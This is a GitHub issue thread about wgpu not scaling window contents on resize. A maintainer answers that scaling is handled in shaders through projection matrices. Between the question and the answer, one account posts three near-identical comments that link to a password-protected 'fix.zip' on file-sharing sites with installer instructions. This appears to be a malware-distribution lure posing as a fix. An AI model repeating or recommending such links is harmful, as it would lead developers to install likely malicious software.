### ISSUE TITLE
Currently, it seems that `wgpu` doesn't have a function to not enlarge/reduce the contents when resizing the window.

### ISSUE THREAD

**Issue by rustbasic** [gfx-rs/wgpu#6158]
Currently, it seems that `wgpu` doesn't have a function to not enlarge/reduce the contents when resizing the window.

In GUIs that use wgpu, you may not want the contents to zoom in/out when resizing the window.

If I'm wrong or there's a way, please let me know.

wgpu: 22.1.0
OS: Windows10

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cwfitzgerald** [comment]
Hello! This is expected to be handled by the user in their shader, generally by using projection matrixes which scale vertices appropriately. If you haven't, I would highly recommend taking a look learn-wgpu or webgpu fundamentals, as this should go over how graphics apis expect things like scaling to work.
